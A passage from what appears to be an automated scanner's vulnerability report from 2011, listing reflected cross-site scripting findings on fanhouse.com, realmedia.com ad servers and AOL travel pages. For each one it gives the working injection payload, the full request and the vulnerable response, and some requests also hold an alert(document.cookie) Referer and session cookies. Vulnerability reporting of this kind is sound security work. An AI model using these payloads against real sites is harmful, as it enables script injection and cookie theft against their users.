GET /?c0eec"-alert(1)-"5808854bd27=1 HTTP/1.1
Host: nba.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:19 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999935
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 87524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
,fanhouse.com,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="NBA";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://nba.fanhouse.com/?c0eec"-alert(1)-"5808854bd27=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.160. http://ncaabasketball.fanhouse.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ncaabasketball.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6117e"-alert(1)-"46f14e1380e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?6117e"-alert(1)-"46f14e1380e=1 HTTP/1.1
Host: ncaabasketball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:16 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999592
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 79220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="NCAABB";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://ncaabasketball.fanhouse.com/?6117e"-alert(1)-"46f14e1380e=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.161. http://ncaafootball.fanhouse.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ncaafootball.fanhouse.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11a90"-alert(1)-"2a24bc7b009 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?11a90"-alert(1)-"2a24bc7b009=1 HTTP/1.1
Host: ncaafootball.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:17 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 76025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv
...[SNIP]...
m,mmafighting.com,mmafighting.net,sports.aol.com,aol.com,fleaflicker.com";
s_265.mmxgo = true;
s_265.prop1="NCAAFB";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://ncaafootball.fanhouse.com/?11a90"-alert(1)-"2a24bc7b009=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.162. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79615"><script>alert(1)</script>45b412626c9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia79615"><script>alert(1)</script>45b412626c9/Retarget_Secure/642496272@Bottom3?_RM_HTML_MM_=500101500015500001101 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFL=011Pl1mCU10EfJ|U10Eo1|U10LxY|U1014lt|U10166E|U1016Pl; NXCLICK2=011Plj3sNX_TRACK_Superpages/Retarget_Landingpage_Nonsecure!y!B3!LxY!puiI

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:49:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:50:39 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia79615"><script>alert(1)</script>45b412626c9/Retarget_Secure/403581089/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=500101500015500001101" target="_top">
...[SNIP]...

1.163. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d5e"><script>alert(1)</script>1a204efbd96 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secureb2d5e"><script>alert(1)</script>1a204efbd96/642496272@Bottom3?_RM_HTML_MM_=500101500015500001101 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFL=011Pl1mCU10EfJ|U10Eo1|U10LxY|U1014lt|U10166E|U1016Pl; NXCLICK2=011Plj3sNX_TRACK_Superpages/Retarget_Landingpage_Nonsecure!y!B3!LxY!puiI

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:49:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:50:41 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secureb2d5e"><script>alert(1)</script>1a204efbd96/L18/1519301022/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?1519301022" TARGET=_blank>

1.164. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cb47"><script>alert(1)</script>3d74b029401 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom32cb47"><script>alert(1)</script>3d74b029401?_RM_HTML_MM_=500101500015500001101 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFL=011Pl1mCU10EfJ|U10Eo1|U10LxY|U1014lt|U10166E|U1016Pl; NXCLICK2=011Plj3sNX_TRACK_Superpages/Retarget_Landingpage_Nonsecure!y!B3!LxY!puiI

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:49:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 389
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:50:44 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/487386772/Bottom32cb47"><script>alert(1)</script>3d74b029401/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=500101500015500001101" target="_top">
...[SNIP]...

1.165. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3 [_RM_HTML_MM_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83b2b"-alert(1)-"6894311a107 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3?_RM_HTML_MM_=50010150001550000110183b2b"-alert(1)-"6894311a107 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFL=011Pl1mCU10EfJ|U10Eo1|U10LxY|U1014lt|U10166E|U1016Pl; NXCLICK2=011Plj3sNX_TRACK_Superpages/Retarget_Landingpage_Nonsecure!y!B3!LxY!puiI

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:49:37 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011PmBY9O10M69; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 601
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:50:37 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "50010150001550000110183b2b"-alert(1)-"6894311a107";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

1.166. http://news.travel.aol.com/2009/06/01/long-weekend-getaways-within-the-united-states/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /2009/06/01/long-weekend-getaways-within-the-united-states/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d5c"><script>alert(1)</script>a72c54c0017 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2009/06/01/long-weekend-getaways-within-the-united-states/?96d5c"><script>alert(1)</script>a72c54c0017=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:19 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:18 GMT; path=/
Keep-Alive: timeout=5, max=999688
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 89596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/2009/06/01/long-weekend-getaways-within-the-united-states/?96d5c"><script>alert(1)</script>a72c54c0017=1" />
...[SNIP]...

1.167. http://news.travel.aol.com/2010/10/18/five-secret-hotels-where-you-can-stay-cheap-in-new-york/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /2010/10/18/five-secret-hotels-where-you-can-stay-cheap-in-new-york/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21590"><script>alert(1)</script>0c2f336d704 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/10/18/five-secret-hotels-where-you-can-stay-cheap-in-new-york/?21590"><script>alert(1)</script>0c2f336d704=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:20 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:19 GMT; path=/
Keep-Alive: timeout=5, max=999975
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 70564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/2010/10/18/five-secret-hotels-where-you-can-stay-cheap-in-new-york/?21590"><script>alert(1)</script>0c2f336d704=1" />
...[SNIP]...

1.168. http://news.travel.aol.com/2011/01/12/travel-myths-debunked/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /2011/01/12/travel-myths-debunked/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de56"><script>alert(1)</script>fa2fd84284b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/12/travel-myths-debunked/?5de56"><script>alert(1)</script>fa2fd84284b=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:23 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:22 GMT; path=/
Keep-Alive: timeout=5, max=999980
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 108204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/2011/01/12/travel-myths-debunked/?5de56"><script>alert(1)</script>fa2fd84284b=1" />
...[SNIP]...

1.169. http://news.travel.aol.com/2011/02/04/pilot-falls-into-deep-sleep-on-sas-flight/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /2011/02/04/pilot-falls-into-deep-sleep-on-sas-flight/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d2d5"><script>alert(1)</script>d79e2e7793e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/04/pilot-falls-into-deep-sleep-on-sas-flight/?4d2d5"><script>alert(1)</script>d79e2e7793e=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:23 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:22 GMT; path=/
Keep-Alive: timeout=5, max=999914
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 94538

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/2011/02/04/pilot-falls-into-deep-sleep-on-sas-flight/?4d2d5"><script>alert(1)</script>d79e2e7793e=1" />
...[SNIP]...

1.170. http://news.travel.aol.com/2011/02/04/virginia-hotel-casts-out-snow-refugees/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /2011/02/04/virginia-hotel-casts-out-snow-refugees/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9a1e"><script>alert(1)</script>7f2ad4a8dc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/04/virginia-hotel-casts-out-snow-refugees/?a9a1e"><script>alert(1)</script>7f2ad4a8dc9=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:22 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:21 GMT; path=/
Keep-Alive: timeout=5, max=999947
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 67545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/2011/02/04/virginia-hotel-casts-out-snow-refugees/?a9a1e"><script>alert(1)</script>7f2ad4a8dc9=1" />
...[SNIP]...

1.171. http://news.travel.aol.com/2011/02/04/world-s-largest-gay-cruise-sets-sail-on-sunday/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /2011/02/04/world-s-largest-gay-cruise-sets-sail-on-sunday/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5186"><script>alert(1)</script>a0c68995fa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/04/world-s-largest-gay-cruise-sets-sail-on-sunday/?b5186"><script>alert(1)</script>a0c68995fa0=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:27 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:26 GMT; path=/
Keep-Alive: timeout=5, max=999997
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 89970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/2011/02/04/world-s-largest-gay-cruise-sets-sail-on-sunday/?b5186"><script>alert(1)</script>a0c68995fa0=1" />
...[SNIP]...

1.172. http://news.travel.aol.com/2011/02/05/american-plane-and-air-force-jets-in-near-miss/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /2011/02/05/american-plane-and-air-force-jets-in-near-miss/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a878f"><script>alert(1)</script>e0f1e935f50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/05/american-plane-and-air-force-jets-in-near-miss/?a878f"><script>alert(1)</script>e0f1e935f50=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:26 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:25 GMT; path=/
Keep-Alive: timeout=5, max=999904
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 92947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://news.travel.aol.com/2011/02/05/american-plane-and-air-force-jets-in-near-miss/?a878f"><script>alert(1)</script>e0f1e935f50=1" />
...[SNIP]...

1.173. http://news.travel.aol.com/best-of/when-is-ash-wednesday-2011/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.travel.aol.com
Path:   /best-of/when-is-ash-wednesday-2011/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15cf3"><script>alert(1)</script>4e8bf31abab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /best-of/when-is-ash-wednesday-2011/?15cf3"><script>alert(1)</script>4e8bf31abab=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:23:25 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:23:24 GMT; path=/
